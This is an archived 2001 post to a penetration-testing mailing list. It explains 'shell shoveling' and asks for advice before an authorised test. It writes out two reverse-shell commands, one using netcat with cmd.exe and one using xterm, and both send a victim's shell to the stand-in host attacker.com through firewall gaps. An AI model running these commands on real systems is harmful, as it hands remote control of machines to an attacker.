Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Shell Shoveling?!?

From: "Junginger, Jeremy" <jjunginger () Calence com>
Date: Tue, 2 Oct 2001 11:15:28 -0700 
 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Have you guys ever heard of shell shoveling? In playing with NetCat
and reading an infoworld article, I came across a couple of concepts
that I found fascinating.  Below are the explanations and command
lines:

"If the attacker machine is listening with netcat on TCP 80 and 25,
and TCP 80 is allowed inbound and 25 outbound to/from the victim
through the firewall, then this command "shovels" a remote command
shell from victim to attacker.com."

nc attacker.com 80 | cmd.exe | nc attacker.com 25

"If Xterm (TCP 6000) is allowed outbound without restriction, then
the following command would be a nifty Unix equivalent to the above
example:"

xterm -display attacker.com:0.0 &

I am planning on using this in an upcomint p.t. and wanted to gain
your insights!  Thanks!



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBO7oEDKlk83sSWEI4EQJT5gCgoed9mdrH4FMkU1vse5zBg1fkiqcAnAsv
0Em+lFGcjjX00Jd6eTEGSSFw
=BUzY
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: